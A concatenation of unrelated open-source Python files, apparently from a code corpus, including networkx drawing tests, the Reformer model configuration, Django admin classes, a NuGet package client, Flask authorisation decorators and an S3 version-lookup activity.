G, pos, edgelist=[(4, 5), (5, 6), (6, 7)], edge_color=(1.0, 0.4, 0.3)
)
# with rgb tuple in list
nx.draw_networkx_edges(
G, pos, edgelist=[(7, 8), (8, 9)], edge_color=[(0.4, 1.0, 0.0)]
)
# with rgba tuple and 4 edges - is interpretted with cmap
nx.draw_networkx_edges(
G,
pos,
edgelist=[(9, 10), (10, 11), (10, 12), (10, 13)],
edge_color=(0.0, 1.0, 1.0, 0.5),
)
# with rgba tuple in list
nx.draw_networkx_edges(
G,
pos,
edgelist=[(9, 10), (10, 11), (10, 12), (10, 13)],
edge_color=[(0.0, 1.0, 1.0, 0.5)],
)
# with color string and global alpha
nx.draw_networkx_edges(
G, pos, edgelist=[(11, 12), (11, 13)], edge_color="purple", alpha=0.2
)
# with color string in a list
nx.draw_networkx_edges(
G, pos, edgelist=[(11, 12), (11, 13)], edge_color=["purple"]
)
# with single edge and hex color string
nx.draw_networkx_edges(G, pos, edgelist=[(12, 13)], edge_color="#1f78b4f0")
# edge_color as numeric using vmin, vmax
nx.draw_networkx_edges(
G,
pos,
edgelist=[(7, 8), (8, 9)],
edge_color=[0.2, 0.5],
edge_vmin=0.1,
edge_vmax=0.6,
)
# plt.show()
def test_labels_and_colors():
G = nx.cubical_graph()
pos = nx.spring_layout(G) # positions for all nodes
# nodes
nx.draw_networkx_nodes(
G, pos, nodelist=[0, 1, 2, 3], node_color="r", node_size=500, alpha=0.75
)
nx.draw_networkx_nodes(
G,
pos,
nodelist=[4, 5, 6, 7],
node_color="b",
node_size=500,
alpha=[0.25, 0.5, 0.75, 1.0],
)
# edges
nx.draw_networkx_edges(G, pos, width=1.0, alpha=0.5)
nx.draw_networkx_edges(
G,
pos,
edgelist=[(0, 1), (1, 2), (2, 3), (3, 0)],
width=8,
alpha=0.5,
edge_color="r",
)
nx.draw_networkx_edges(
G,
pos,
edgelist=[(4, 5), (5, 6), (6, 7), (7, 4)],
width=8,
alpha=0.5,
edge_color="b",
)
nx.draw_networkx_edges(
G,
pos,
edgelist=[(4, 5), (5, 6), (6, 7), (7, 4)],
min_source_margin=0.5,
min_target_margin=0.75,
width=8,
edge_color="b",
)
# some math labels
labels = {}
labels[0] = r"$a$"
labels[1] = r"$b$"
labels[2] = r"$c$"
labels[3] = r"$d$"
labels[4] = r"$\alpha$"
labels[5] = r"$\beta$"
labels[6] = r"$\gamma$"
labels[7] = r"$\delta$"
nx.draw_networkx_labels(G, pos, labels, font_size=16)
nx.draw_networkx_edge_labels(G, pos, edge_labels=None, rotate=False)
nx.draw_networkx_edge_labels(G, pos, edge_labels={(4, 5): "4-5"})
# plt.show()
def test_axes():
fig, ax = plt.subplots()
nx.draw(barbell, ax=ax)
nx.draw_networkx_edge_labels(barbell, nx.circular_layout(barbell), ax=ax)
def test_empty_graph():
G = nx.Graph()
nx.draw(G)
def test_draw_empty_nodes_return_values():
# See Issue #3833
import matplotlib.collections # call as mpl.collections
G = nx.Graph([(1, 2), (2, 3)])
DG = nx.DiGraph([(1, 2), (2, 3)])
pos = nx.circular_layout(G)
assert isinstance(
nx.draw_networkx_nodes(G, pos, nodelist=[]), mpl.collections.PathCollection
)
assert isinstance(
nx.draw_networkx_nodes(DG, pos, nodelist=[]), mpl.collections.PathCollection
)
# drawing empty edges used to return an empty LineCollection or empty list.
# Now it is always an empty list (because edges are now lists of FancyArrows)
assert nx.draw_networkx_edges(G, pos, edgelist=[], arrows=True) == []
assert nx.draw_networkx_edges(G, pos, edgelist=[], arrows=False) == []
assert nx.draw_networkx_edges(DG, pos, edgelist=[], arrows=False) == []
assert nx.draw_networkx_edges(DG, pos, edgelist=[], arrows=True) == []
def test_multigraph_edgelist_tuples():
# See Issue #3295
G = nx.path_graph(3, create_using=nx.MultiDiGraph)
nx.draw_networkx(G, edgelist=[(0, 1, 0)])
nx.draw_networkx(G, edgelist=[(0, 1, 0)], node_size=[10, 20, 0])
def test_alpha_iter():
pos = nx.random_layout(barbell)
# with fewer alpha elements than nodes
plt.subplot(131)
nx.draw_networkx_nodes(barbell, pos, alpha=[0.1, 0.2])
# with equal alpha elements and nodes
num_nodes = len(barbell.nodes)
alpha = [x / num_nodes for x in range(num_nodes)]
colors = range(num_nodes)
plt.subplot(132)
nx.draw_networkx_nodes(barbell, pos, node_color=colors, alpha=alpha)
# with more alpha elements than nodes
alpha.append(1)
plt.subplot(133)
nx.draw_networkx_nodes(barbell, pos, alpha=alpha)
def test_error_invalid_kwds():
with pytest.raises(ValueError, match="Received invalid argument"):
nx.draw(barbell, foo="bar")
def test_np_edgelist():
# see issue #4129
np = pytest.importorskip("numpy")
nx.draw_networkx(barbell, edgelist=np.array([(0, 2), (0, 3)]))
def test_draw_nodes_missing_node_from_position():
G = nx.path_graph(3)
pos = {0: (0, 0), 1: (1, 1)} # No position for node 2
with pytest.raises(nx.NetworkXError, match="has no position"):
nx.draw_networkx_nodes(G, pos)
# NOTE: parametrizing on marker to test both branches of internal
# nx.draw_networkx_edges.to_marker_edge function
@pytest.mark.parametrize("node_shape", ("o", "s"))
def test_draw_edges_min_source_target_margins(node_shape):
"""Test that there is a wider gap between the node and the start of an
incident edge when min_source_margin is specified.
This test checks that the use of min_{source/target}_margin kwargs result
in shorter (more padding) between the edges and source and target nodes.
As a crude visual example, let 's' and 't' represent source and target
nodes, respectively:
Default:
s-----------------------------t
With margins:
s ----------------------- t
"""
# Create a single axis object to get consistent pixel coords across
# multiple draws
fig, ax = plt.subplots()
G = nx.Graph([(0, 1)])
pos = {0: (0, 0), 1: (1, 0)} # horizontal layout
# Get leftmost and rightmost points of the FancyArrowPatch object
# representing the edge between nodes 0 and 1 (in pixel coordinates)
default_patch = nx.draw_networkx_edges(G, pos, ax=ax, node_shape=node_shape)[0]
default_extent = default_patch.get_extents().corners()[::2, 0]
# Now, do the same but with "padding" for the source and target via the
# min_{source/target}_margin kwargs
padded_patch = nx.draw_networkx_edges(
G,
pos,
ax=ax,
node_shape=node_shape,
min_source_margin=100,
min_target_margin=100,
)[0]
padded_extent = padded_patch.get_extents().corners()[::2, 0]
# With padding, the left-most extent of the edge should be further to the
# right
assert padded_extent[0] > default_extent[0]
# And the rightmost extent of the edge, further to the left
assert padded_extent[1] < default_extent[1]
def test_nonzero_selfloop_with_single_node():
"""Ensure that selfloop extent is non-zero when there is only one node."""
# Create explicit axis object for test
fig, ax = plt.subplots()
# Graph with single node + self loop
G = nx.Graph()
G.add_node(0)
G.add_edge(0, 0)
# Draw
patch = nx.draw_networkx_edges(G, {0: (0, 0)})[0]
# The resulting patch must have non-zero extent
bbox = patch.get_extents()
assert bbox.width > 0 and bbox.height > 0
# Cleanup
plt.delaxes(ax)
def test_nonzero_selfloop_with_single_edge_in_edgelist():
"""Ensure that selfloop extent is non-zero when only a single edge is
specified in the edgelist.
"""
# Create explicit axis object for test
fig, ax = plt.subplots()
# Graph with selfloop
G = nx.path_graph(2)
G.add_edge(1, 1)
pos = {n: (n, n) for n in G.nodes}
# Draw only the selfloop edge via the `edgelist` kwarg
patch = nx.draw_networkx_edges(G, pos, edgelist=[(1, 1)])[0]
# The resulting patch must have non-zero extent
bbox = patch.get_extents()
assert bbox.width > 0 and bbox.height > 0
# Cleanup
plt.delaxes(ax)
def test_apply_alpha():
"""Test apply_alpha when there is a mismatch between the number of
supplied colors and elements.
"""
nodelist = [0, 1, 2]
colorlist = ["r", "g", "b"]
alpha = 0.5
rgba_colors = nx.drawing.nx_pylab.apply_alpha(colorlist, alpha, nodelist)
assert all(rgba_colors[:, -1] == alpha)
|
the-stack_0_6188 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
author: http://stackoverflow.com/users/476920/xperroni
"""
from HTMLParser import HTMLParser
from re import sub
from sys import stderr
from traceback import print_exc
class _DeHTMLParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.__text = []
def handle_data(self, data):
text = data.strip()
if len(text) > 0:
text = sub('[ \t\r\n]+', ' ', text)
self.__text.append(text + ' ')
def handle_starttag(self, tag, attrs):
if tag == 'p':
self.__text.append('\n\n')
elif tag == 'br':
self.__text.append('\n')
def handle_startendtag(self, tag, attrs):
if tag == 'br':
self.__text.append('\n\n')
def text(self):
return ''.join(self.__text).strip()
def dehtml(text):
try:
parser = _DeHTMLParser()
parser.feed(text)
parser.close()
return parser.text()
except:
print_exc(file=stderr)
return text
def main():
text = r'''
Picasa工具箱Tool for Picasa Google+ Photo是目前最好的Picasa管理器,只是感觉Picasa有些过时了... <span style="color: #999">点评来自 <a
href="/u/97100">@tastypear
'''
print(dehtml(text))
if __name__ == '__main__':
main()
|
the-stack_0_6189 | '''
Created by yong.huang on 2016.11.04
'''
from hifive.api.base import RestApi
class HFClearMemberSheetMusicRequest(RestApi):
def __init__(self, domain=None, port=80, method=None):
domain = domain or 'hifive-gateway-test.hifiveai.com';
method = method or 'POST';
RestApi.__init__(self,domain, port,method)
self.accessToken = None
self.sheetId = None
def getapiname(self):
return 'ClearMemberSheetMusic'
|
the-stack_0_6190 | # coding=utf-8
# Copyright 2020 The Trax Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Reformer model configuration """
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
REFORMER_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"google/reformer-crime-and-punishment": "https://cdn.huggingface.co/google/reformer-crime-and-punishment/config.json",
"google/reformer-enwik8": "https://cdn.huggingface.co/google/reformer-enwik8/config.json",
}
class ReformerConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a :class:`~transformers.ReformerModel`. It is used to
instantiate a Reformer model according to the specified arguments, defining the model architecture.
Configuration objects inherit from :class:`~transformers.PretrainedConfig` and can be used to control the model
outputs. Read the documentation from :class:`~transformers.PretrainedConfig` for more information.
Args:
attention_head_size (:obj:`int`, `optional`, defaults to 64):
Dimensionality of the projected key, query and value vectors
attn_layers (:obj:`List[str]`, `optional`, defaults to :obj:`["local", "lsh", "local", "lsh", "local", "lsh"]`):
List of attention layer types in ascending order. It can be chosen between a LSHSelfAttention layer
(:obj:`"lsh"`) and a LocalSelfAttention layer (:obj:`"local"`).
For more information on LSHSelfAttention layer, see `LSH Self Attention
<reformer.html#lsh-self-attention>`__. For more information on LocalSelfAttention layer, see `Local Self
Attention <reformer.html#local-sensitive-hashing-self-attention>`__.
axial_pos_embds (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not to use axial position embeddings. For more information on how axial position embeddings
work, see `Axial Position Encodings <reformer.html#axial-positional-encodings>`__.
axial_norm_std (:obj:`float`, `optional`, defaults to 1.0):
The standard deviation of the normal_initializer for initializing the weight matrices of the axial
positional encodings.
axial_pos_shape (:obj:`List[int]`, `optional`, defaults to :obj:`[64, 64]`):
The position dims of the axial position encodings. During training the product of the position dims has to
be equal to the sequence length.
For more information on how axial position embeddings work, see `Axial Position Encodings
<reformer.html#axial-positional-encodings>`__.
axial_pos_embds_dim (:obj:`List[int]`, `optional`, defaults to :obj:`[64, 192]`):
The embedding dims of the axial position encodings. The sum of the embedding dims has to be equal to the
hidden size.
For more information on how axial position embeddings work, see `Axial Position Encodings
<reformer.html#axial-positional-encodings>`__.
chunk_size_lm_head (:obj:`int`, `optional`, defaults to 0):
The chunk size of the final language model feed forward head layer. A chunk size of 0 means that the feed
forward layer is not chunked. A chunk size of n means that the feed forward layer processes n <
sequence_length embeddings at a time.
For more information on feed forward chunking, see `How does Feed Forward Chunking work?
<../glossary.html#feed-forward-chunking>`__.
eos_token_id (:obj:`int`, `optional`, defaults to 2):
The token id for the end-of-sentence token.
feed_forward_size (:obj:`int`, `optional`, defaults to 512):
Dimensionality of the feed_forward layer in the residual attention block.
hash_seed (:obj:`int`, `optional`):
Seed that can be used to make local sensitive hashing in :obj:`LSHSelfAttention` deterministic. This should
only be set for testing purposed. For evaluation and training purposes :obj:`hash_seed` should be left as
:obj:`None` to ensure fully random rotations in local sensitive hashing scheme.
hidden_act (:obj:`str` or :obj:`Callable`, `optional`, defaults to :obj:`"relu"`):
The non-linear activation function (function or string) in the feed forward layer in the residual attention
block. If string, :obj:`"gelu"`, :obj:`"relu"`, :obj:`"silu"` and :obj:`"gelu_new"` are supported.
hidden_dropout_prob (:obj:`float`, `optional`, defaults to 0.05):
The dropout probability for all fully connected layers in the embeddings, encoder, and pooler.
hidden_size (:obj:`int`, `optional`, defaults to 256):
Dimensionality of the output hidden states of the residual attention blocks.
initializer_range (:obj:`float`, `optional`, defaults to 0.02):
The standard deviation of the truncated_normal_initializer for initializing all weight matrices.
is_decoder (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether ot not to use a causal mask in addition to the :obj:`attention_mask` passed to
:class:`~transformers.ReformerModel`. When using the Reformer for causal language modeling, this argument
should be set to :obj:`True`.
layer_norm_eps (:obj:`float`, `optional`, defaults to 1e-12):
The epsilon used by the layer normalization layers.
local_chunk_length (:obj:`int`, `optional`, defaults to 64):
Length of chunk which attends to itself in :obj:`LocalSelfAttention`. Chunking reduces memory complexity
from sequence length x sequence length (self attention) to chunk length x chunk length x sequence length /
chunk length (chunked self attention).
local_num_chunks_before (:obj:`int`, `optional`, defaults to 1):
Number of previous neighbouring chunks to attend to in :obj:`LocalSelfAttention` layer to itself.
local_num_chunks_after (:obj:`int`, `optional`, defaults to 0):
Number of following neighbouring chunks to attend to in :obj:`LocalSelfAttention` layer in addition to
itself.
local_attention_probs_dropout_prob (:obj:`float`, `optional`, defaults to 0.1):
The dropout ratio for the attention probabilities in :obj:`LocalSelfAttention`.
lsh_attn_chunk_length (:obj:`int`, `optional`, defaults to 64):
Length of chunk which attends to itself in :obj:`LSHSelfAttention`. Chunking reduces memory complexity from
sequence length x sequence length (self attention) to chunk length x chunk length x sequence length / chunk
length (chunked self attention).
lsh_num_chunks_before (:obj:`int`, `optional`, defaults to 1):
Number of previous neighbouring chunks to attend to in :obj:`LSHSelfAttention` layer to itself.
lsh_num_chunks_after (:obj:`int`, `optional`, defaults to 0):
Number of following neighbouring chunks to attend to in :obj:`LSHSelfAttention` layer to itself.
lsh_attention_probs_dropout_prob (:obj:`float`, `optional`, defaults to 0.1):
The dropout ratio for the attention probabilities in :obj:`LSHSelfAttention`.
max_position_embeddings (:obj:`int`, `optional`, defaults to 4096):
The maximum sequence length that this model might ever be used with. Typically set this to something large
just in case (e.g., 512 or 1024 or 2048).
num_attention_heads (:obj:`int`, `optional`, defaults to 12):
Number of attention heads for each attention layer in the Transformer encoder.
num_buckets (:obj:`int` or :obj:`List[int]`, `optional`):
Number of buckets, the key query vectors can be "hashed into" using the locality sensitive hashing scheme.
Each query key vector is hashed into a hash in :obj:`1, ..., num_buckets`. The number of buckets can also
be factorized into a list for improved memory complexity. In this case, each query key vector is hashed
into a hash in :obj:`1-1, 1-2, ..., num_buckets[0]-1, ..., num_buckets[0]-num_buckets[1]` if
:obj:`num_buckets` is factorized into two factors. The number of buckets (or the product the factors)
should approximately equal sequence length / lsh_chunk_length. If :obj:`num_buckets` not set, a good value
is calculated on the fly.
num_hashes (:obj:`int`, `optional`, defaults to 1):
Number of hashing rounds (e.g., number of random rotations) in Local Sensitive Hashing scheme. The higher
:obj:`num_hashes`, the more accurate the :obj:`LSHSelfAttention` becomes, but also the more memory and time
intensive the hashing becomes.
pad_token_id (:obj:`int`, `optional`, defaults to 0):
The token id for the padding token.
vocab_size (:obj:`int`, `optional`, defaults to 320):\
Vocabulary size of the BERT model. Defines the number of different tokens that can be represented by the
:obj:`inputs_ids` passed when calling :class:`~transformers.ReformerModel`.
tie_word_embeddings (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether to tie input and output embeddings.
use_cache (:obj:`bool`, `optional`, defaults to :obj:`True`):
Whether or not the model should return the last key/values attentions (not used by all models).
Examples::
>>> from transformers import ReformerModel, ReformerConfig
>>> # Initializing a Reformer configuration
>>> configuration = ReformerConfig()
>>> # Initializing a Reformer model
>>> model = ReformerModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
"""
model_type = "reformer"
keys_to_ignore_at_inference = ["past_buckets_states"]
def __init__(
self,
attention_head_size=64,
attn_layers=["local", "lsh", "local", "lsh", "local", "lsh"],
axial_norm_std=1.0,
axial_pos_embds=True,
axial_pos_shape=[64, 64],
axial_pos_embds_dim=[64, 192],
chunk_size_lm_head=0,
eos_token_id=2,
feed_forward_size=512,
hash_seed=None,
hidden_act="relu",
hidden_dropout_prob=0.05,
hidden_size=256,
initializer_range=0.02,
is_decoder=False,
layer_norm_eps=1e-12,
local_num_chunks_before=1,
local_num_chunks_after=0,
local_attention_probs_dropout_prob=0.05,
local_attn_chunk_length=64,
lsh_attn_chunk_length=64,
lsh_attention_probs_dropout_prob=0.0,
lsh_num_chunks_before=1,
lsh_num_chunks_after=0,
max_position_embeddings=4096,
num_attention_heads=12,
num_buckets=None,
num_hashes=1,
pad_token_id=0,
vocab_size=320,
tie_word_embeddings=False,
use_cache=True,
**kwargs
):
super().__init__(
pad_token_id=pad_token_id,
eos_token_id=eos_token_id,
is_decoder=is_decoder,
tie_word_embeddings=tie_word_embeddings,
**kwargs,
)
self.hash_seed = hash_seed
self.vocab_size = vocab_size
self.attention_head_size = attention_head_size
self.hidden_size = hidden_size
self.num_attention_heads = num_attention_heads
self.num_hashes = num_hashes
self.num_hidden_layers = len(attn_layers)
self.num_buckets = tuple(num_buckets) if isinstance(num_buckets, list) else num_buckets
self.lsh_attn_chunk_length = lsh_attn_chunk_length
self.local_attn_chunk_length = local_attn_chunk_length
self.lsh_num_chunks_after = lsh_num_chunks_after
self.lsh_num_chunks_before = lsh_num_chunks_before
self.local_num_chunks_after = local_num_chunks_after
self.local_num_chunks_before = local_num_chunks_before
self.hidden_act = hidden_act
self.feed_forward_size = feed_forward_size
self.hidden_dropout_prob = hidden_dropout_prob
self.lsh_attention_probs_dropout_prob = lsh_attention_probs_dropout_prob
self.local_attention_probs_dropout_prob = local_attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.initializer_range = initializer_range
self.layer_norm_eps = layer_norm_eps
self.axial_pos_embds = axial_pos_embds
self.axial_pos_shape = tuple(axial_pos_shape)
self.axial_pos_embds_dim = tuple(axial_pos_embds_dim)
self.axial_norm_std = axial_norm_std
self.chunk_size_lm_head = chunk_size_lm_head
self.attn_layers = attn_layers
self.use_cache = use_cache
|
the-stack_0_6192 | from django.contrib import admin
from django.db.models import Count
from django.template.defaultfilters import truncatechars
from django.utils.translation import gettext_lazy as _
from guardian.admin import GuardedModelAdmin
from rest_framework_api_key.admin import APIKeyModelAdmin
from rest_framework_api_key.models import APIKey
from .models import Service, ServiceAPIKey, ServiceClientId
@admin.register(ServiceClientId)
class ServiceClientIdAdmin(admin.ModelAdmin):
list_display = ("get_service_name", "client_id")
search_fields = ("service__name", "client_id")
autocomplete_fields = ("service",)
@admin.display(description=_("service"), ordering="-service__name")
def get_service_name(self, obj):
return obj.service.name
class ServiceClientIdInline(admin.StackedInline):
model = ServiceClientId
extra = 0
@admin.register(Service)
class ServiceAdmin(GuardedModelAdmin):
list_display = ("name", "short_description", "api_key_count")
search_fields = ("name",)
inlines = (ServiceClientIdInline,)
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.annotate(api_keys_count=Count("api_keys"))
@admin.display(description=_("description"))
def short_description(self, obj: Service):
return truncatechars(obj.description, 255)
@admin.display(description=_("api keys"), ordering="api_keys_count")
def api_key_count(self, obj):
return obj.api_keys_count
@admin.register(ServiceAPIKey)
class ServiceAPIKeyModelAdmin(APIKeyModelAdmin):
list_display = (*APIKeyModelAdmin.list_display, "get_service_name")
search_fields = (*APIKeyModelAdmin.search_fields, "service__name")
autocomplete_fields = ("service",)
list_select_related = ("service",)
@admin.display(description=_("service"), ordering="-service__name")
def get_service_name(self, obj):
return obj.service.name
admin.site.unregister(APIKey)
|
the-stack_0_6195 | import datetime
import functools
import logging
from enum import Enum
from typing import AsyncGenerator, List, Union
from ..smart_client import SmartClient
import nuget_package_scanner.nuget
import nuget_package_scanner.nuget.date_util as date_util
import nuget_package_scanner.nuget.version_util as version_util
from .nuget_server import NugetServer
from .nuget_config import Package
from .registrations import RegistrationsIndex
from .version_util import VersionPart
class Nuget:
"""
Nuget client that can be used to retrieve package registration info from multiple Nuget Servers.
"""
async def __aenter__(self):
await self.initialize_clients()
return self
async def __aexit__(self, exc_type, exc_value, traceback):
return
def __init__(self, client: SmartClient, configs: dict = {}):
"""
Initializes the client.
param: configs Additional Nuget servers to search if a package is not found on nuget.org.\n
key: Nuget server server index url
value: Name
"""
self._configs = configs
self._clients_cache: List[NugetServer] = []
self._package_cache = {}
self._client = client
async def initialize_clients(self):
await self.__get_clients()
async def __get_clients(self):
if self._clients_cache:
return self._clients_cache
self._clients_cache.append(await NugetServer.create(self._client)) # ensuring that nuget.org is added first
for c in self._configs:
self._clients_cache.append(await NugetServer.create(self._client,c))
return self._clients_cache
async def get_fetch_package_details(self, package: Package):
"""
Attempts to ge the package from cache, then falls back to a nuget server query if not found.
If a server query is attempted, this fetches nuget package details from the first :class nuget.RegistrationsIndex found
for :param package. The strategy is to first search for package registrations at nuget.org and then
to cycle through any :param configs that have been provided.
"""
assert isinstance(package, Package)
nuget_server: NugetServer = await self.__fetch_server_for_id(package.name)
# Note: If you're wondering where caching is at, it's on in the client
if nuget_server:
registrations_index = await nuget_server.registrations.index(package.name) # will already be cached
package.source = registrations_index.url
await self.__fetch_and_populate_version(registrations_index, package)
await self.__fetch_and_populate_latest_release(registrations_index, package)
await self.__fetch_and_populate_latest_version(registrations_index, package)
package.available_version_count = self.__get_available_package_count(registrations_index)
if package.version and package.latest_release:
version_diff = version_util.get_version_count_behind(package.version, package.latest_release)
package.major_releases_behind = version_diff[VersionPart.MAJOR]
package.minor_releases_behind = version_diff[VersionPart.MINOR]
package.patch_releases_behind = version_diff[VersionPart.PATCH]
package.set_details_url(nuget_server.package_uri_template)
else:
logging.warn(f'Could not find {package.name} in any of the configured nuget servers.')
async def __fetch_server_for_id(self, id: str) -> NugetServer:
"""
Returns the first :type nuget.NugetServer that houses the provided :param id.
The strategy is to first search for package registrations at nuget.org and then
to cycle through any :param configs that have been provided.
:param configs: A :class:dict that contains non-nuget.org server implementations to query
:param id: A :class:dict that contains non-nuget.org server implementations to query
"""
## TODO: Allow for preferred ordering in some cases? You may have a convention or some other means that allows you to know exactly which server to query.
for c in await self.__get_clients():
index = await c.registrations.index(id)
if index:
return c
# TODO: Potentially optimize these
async def __fetch_and_populate_version(self, registrationsIndex: RegistrationsIndex, package: Package):
if registrationsIndex and package.version:
for page in registrationsIndex.items:
if not version_util.is_newer_release(page.upper, package.version):
for leaf in await page.items():
if leaf.catalogEntry.version == package.version and leaf.commitTimeStamp:
package.version_date = date_util.get_date_from_iso_string(leaf.commitTimeStamp).strftime('%Y-%m-%d')
return
async def __fetch_and_populate_latest_version(self, registrationsIndex: RegistrationsIndex, package: Package):
# current version metadata
if registrationsIndex:
# assuming the newest is aways at the end of the list
for page in reversed(registrationsIndex.items):
for leaf in reversed(await page.items()):
package.latest_version = leaf.catalogEntry.version
if leaf.commitTimeStamp:
package.latest_version_date = date_util.get_date_from_iso_string(leaf.commitTimeStamp).strftime('%Y-%m-%d')
return
async def __fetch_and_populate_latest_release(self, registrationsIndex: RegistrationsIndex, package: Package):
# current version metadata
if registrationsIndex:
# assuming the newest is aways at the end of the list
for page in reversed(registrationsIndex.items):
for leaf in reversed(await page.items()):
if version_util.is_full_release(leaf.catalogEntry.version):
package.latest_release = leaf.catalogEntry.version
if leaf.commitTimeStamp:
package.latest_release_date = date_util.get_date_from_iso_string(leaf.commitTimeStamp).strftime('%Y-%m-%d')
return
def __get_available_package_count(self, registrationsIndex: RegistrationsIndex) -> int:
count = 0
if registrationsIndex:
for page in registrationsIndex.items:
count += page.count
return count
|
the-stack_0_6201 |
"""contains custom scrapy pipeline."""
class IndexPipeline(object):
"""This class renames _index field."""
def process_item(self, item, spider):
"""implements https://doc.scrapy.org/en/latest/topics/item-pipeline.html#process_item"""
if item.get('_index'):
item['self'] = item.pop('_index')
return item
|
the-stack_0_6202 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps
from werkzeug.exceptions import Forbidden
from .models import *
# from flask_jwt_extended.view_decorators import _decode_jwt_from_request
from flask_jwt_extended import verify_jwt_in_request, get_jwt_claims
from lgw import lxd_api_get
def import_user():
"""
Get user identity from json web token
:return: current_identity
"""
try:
from flask_jwt_extended import get_jwt_identity
current_identity = User.query.get(int(get_jwt_identity()))
return current_identity
except ImportError:
raise ImportError(
'User argument not passed')
def populate_instances_table():
"""
Search for new or deleted instances and update their status in local database
"""
database_lxdservers_list = Server.query.all()
for lxdserver in database_lxdservers_list:
all = []
try:
res = lxd_api_get(lxdserver, 'instances')
for c in res.json()['metadata']:
all.append(c[15:]) # get instance name from api url
except Exception as e:
print(e)
current_instances_list = tuple(all)
database_instances_list = Instance.query.filter_by(location=lxdserver.name)
database_instances_list_names = [str(i.name) for i in database_instances_list]
# Removing old instances from database
for inst in database_instances_list:
if not inst.name in current_instances_list:
db.session.delete(inst)
db.session.commit()
if len(inst.servers) == 0:
db.session.delete(inst)
db.session.commit()
# Adding new instances to database
for cinst in current_instances_list:
if not cinst in database_instances_list_names:
instance = Instance()
instance.name = cinst
instance.location = lxdserver.name
db.session.add(instance)
db.session.commit()
lxdserver.instances.append(instance.id)
db.session.commit()
db.session.commit()
def user_has(ability, get_user=import_user):
"""
Takes an ability (a string name of either a role or an ability) and returns the function if the user has that ability
:param ability:
:param get_user:
:return: wrapper:
"""
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
desired_ability = Ability.query.filter_by(
name=ability).first()
user_abilities = []
current_identity = get_user()
for group in current_identity._groups:
user_abilities += group.abilities
if current_identity.admin or desired_ability.id in user_abilities:
return func(*args, **kwargs)
else:
raise Forbidden("You do not have access")
return inner
return wrapper
def otp_confirmed(fn):
"""
If you decorate a vew with this, it will ensure that the requester has a
valid JWT before calling the actual view. This does check if otp is confirmed
:param fn: The view function to decorate
"""
@wraps(fn)
def wrapper(*args, **kwargs):
# jwt_data = _decode_jwt_from_request(request_type='access')
# print(jwt_data)
verify_jwt_in_request()
claims = get_jwt_claims()
if claims['otp_confirmed'] == False:
raise Forbidden("You do not have access")
else:
return fn(*args, **kwargs)
return wrapper
|
the-stack_0_6203 | from S3utility.s3_notification_info import S3NotificationInfo
from provider.execution_context import get_session
from provider.article_structure import ArticleInfo
import provider.lax_provider
from activity.objects import Activity
lookup_functions = {
"article_next_version": provider.lax_provider.article_next_version,
"article_highest_version": provider.lax_provider.article_highest_version,
}
class activity_VersionLookup(Activity):
def __init__(self, settings, logger, conn=None, token=None, activity_task=None):
super(activity_VersionLookup, self).__init__(
settings, logger, conn, token, activity_task
)
self.name = "VersionLookup"
self.pretty_name = "Version Lookup"
self.version = "1"
self.default_task_heartbeat_timeout = 30
self.default_task_schedule_to_close_timeout = 60 * 5
self.default_task_schedule_to_start_timeout = 30
self.default_task_start_to_close_timeout = 60 * 5
self.description = (
"Looks up version on Lax endpoints and stores version in session"
)
self.logger = logger
def do_activity(self, data=None):
try:
info = S3NotificationInfo.from_dict(data)
filename = info.file_name[info.file_name.rfind("/") + 1 :]
run = data["run"]
session = get_session(self.settings, data, run)
session.store_value("filename_last_element", filename)
session.store_value("run_type", data.get("run_type"))
article_structure = ArticleInfo(filename)
if article_structure.article_id is None:
self.logger.error(
"Name '%s' did not match expected pattern for article id" % filename
)
raise RuntimeError(
"article_structure.article_id is None. File pattern problem."
)
version = self.get_version(
self.settings, article_structure, data["version_lookup_function"]
)
session.store_value("version", version)
article_id = str(int(article_structure.article_id))
session.store_value("article_id", article_id)
self.emit_monitor_event(
self.settings,
article_id,
version,
data["run"],
self.pretty_name,
"start",
" ".join(
("Version Lookup for article", article_id, "version:", version)
),
)
self.set_monitor_property(
self.settings, article_id, "article-id", article_id, "text"
)
self.set_monitor_property(
self.settings,
article_id,
"publication-status",
"publication in progress",
"text",
version=version,
)
self.emit_monitor_event(
self.settings,
article_structure.article_id,
version,
data["run"],
self.pretty_name,
"end",
" ".join(
(
"Finished Version Lookup for article",
article_structure.article_id,
"version:",
version,
)
),
)
return self.ACTIVITY_SUCCESS
except Exception as exception:
self.logger.exception(
"Exception when trying to Lookup Version. Error: " + str(exception)
)
return self.ACTIVITY_PERMANENT_FAILURE
def get_version(self, settings, article_structure, lookup_function):
try:
version = article_structure.get_version_from_zip_filename()
if version is None:
return str(
execute_function(
lookup_functions[lookup_function],
article_structure.article_id,
settings,
)
)
return version
except Exception:
self.logger.exception("Exception on function `get_version`")
raise
def execute_function(the_function, arg1, arg2):
return the_function(arg1, arg2)
|
the-stack_0_6204 | """
Custom typing extension.
Classes:
ConstantHolder: Base class for storing constants and avoiding to hardcode everything.
SaveableBaseModel: Child class of pydantic.BaseModel which enables saving and loading that BaseModel.
TypedNamedTuple: Child class of SaveableBaseModel, can be used similarly to a NamedTuple and has some
tensor handling utilities.
ConfigClass: Base class for storing configuration fields that appear in the configuration YAML files.
"""
from __future__ import annotations
import inspect
import json
from collections import Iterable, Mapping
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union, cast
import numpy as np
import torch as th
from pydantic import BaseModel
